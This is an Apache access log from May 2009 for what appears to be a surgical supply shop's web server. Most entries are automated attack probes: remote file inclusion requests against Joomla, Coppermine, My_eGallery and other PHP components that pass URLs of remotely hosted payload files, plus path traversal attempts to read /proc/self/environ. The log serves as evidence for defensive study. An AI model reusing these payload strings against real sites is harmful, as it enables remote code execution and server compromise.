207.44.232.81 - - [19/May/2009:04:48:10 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:48:10 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:48:18 -0400] "GET /logs/access_log.Q108081400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:48:26 -0400] "GET /logs/access_log.Q108090300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:48:34 -0400] "GET /logs/access_log.Q108101800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:04:48:38 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:04:48:38 -0400] "GET //main.php?sayfa=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:04:48:38 -0400] "GET /logs//main.php?sayfa=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:04:48:38 -0400] "GET /logs/access_log.Q108122200//main.php?sayfa=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
24.242.184.98 - - [19/May/2009:04:49:07 -0400] "GET //admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
24.242.184.98 - - [19/May/2009:04:49:07 -0400] "GET /logs//admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
24.242.184.98 - - [19/May/2009:04:49:07 -0400] "GET /logs/access_log.Q109051100//admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:49:21 -0400] "GET /logs/access_log.Q108081400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:49:25 -0400] "GET /logs/access_log.Q108090300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:49:36 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
88.79.172.112 - - [19/May/2009:04:49:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
207.44.232.81 - - [19/May/2009:04:49:54 -0400] "GET /logs/access_log.Q108081300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
88.79.172.112 - - [19/May/2009:04:49:55 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system HTTP/1.1" 200 45246 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:58 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:49:59 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
88.79.172.112 - - [19/May/2009:04:50:01 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):k-system" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
72.30.142.171 - - [19/May/2009:04:50:32 -0400] "GET /logs/access_log.Q108031600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.85.63.226 - - [19/May/2009:04:50:57 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
62.149.163.198 - - [19/May/2009:04:51:00 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
62.149.163.198 - - [19/May/2009:04:51:01 -0400] "GET /modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
62.149.163.198 - - [19/May/2009:04:51:01 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
207.44.232.81 - - [19/May/2009:04:51:03 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:51:03 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET /logs/access_log.Q109030500%20%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:04:51:55 -0400] "GET /logs/access_log.Q109030500%20%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:52:18 -0400] "GET /logs/access_log.Q108040200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:04:53:08 -0400] "GET /logs/access_log.Q108101800%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:53:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [19/May/2009:04:53:52 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:53:52 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:53:52 -0400] "GET /logs/access_log.Q109032000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:53:55 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:53:55 -0400] "GET /logs/access_log.Q109032000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:53:55 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:54:29 -0400] "GET /logs/access_log.Q109051200//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:04:54:31 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:04:54:31 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:04:54:31 -0400] "GET /logs/access_log.Q109032000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:54:35 -0400] "GET /logs/access_log.Q108112300//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:04:54:38 -0400] "GET /logs/access_log.Q108112300//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:54:48 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:04:55:09 -0400] "GET /logs/access_log.Q108112300//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
78.143.46.123 - - [19/May/2009:04:55:15 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
78.143.46.123 - - [19/May/2009:04:55:15 -0400] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.143.46.123 - - [19/May/2009:04:55:15 -0400] "GET /logs/access_log.Q109030500%20%20//modules/coppermine/themes/default/theme.php?THEME_DIR=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:04:55:41 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.83.196 - - [19/May/2009:04:55:41 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
77.232.66.198 - - [19/May/2009:04:55:54 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
